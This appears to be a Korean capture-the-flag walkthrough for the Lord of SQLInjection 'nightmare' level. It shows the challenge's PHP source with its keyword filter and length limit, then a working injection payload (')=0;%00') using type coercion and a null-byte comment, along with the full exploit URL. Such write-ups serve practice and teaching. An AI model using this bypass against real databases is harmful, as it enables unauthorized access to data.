[LOS] nightmare 풀이 - 18번

[LOS] nightmare 풀이

 

PHP & query 

http://www.wechall.net
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])>6) exit("No Hack ~_~"); 
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("nightmare"); 
  highlight_file(__FILE__); 
?>

select id from prob_gremlin where id='' and pw=''

 

문제 풀이

solve 조건

if($result['id']) solve("nightmare"); 

id값이 있기만하면 문제가 해결된다.

 

특수문자 제약

  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])>6) exit("No Hack ~_~"); 

 6자리 이상이면 안된다.

 

 

sqlInjection 쿼리

select id from prob_nightmare where pw=('')=0;') and id!='admin'

문자열에 숫자가 없을경우 정수형타입의 0으로 형변환된다. ;%00으로 주석을 만들어준다

ex) pw('1a') = 1 (true) // 앞에 숫자가 1이여서 1로 형변환

 

URL

los.rubiya.kr/chall/nightmare_be1285a95aa20e8fa154cb977c37fee5.php?pw=')=0;%00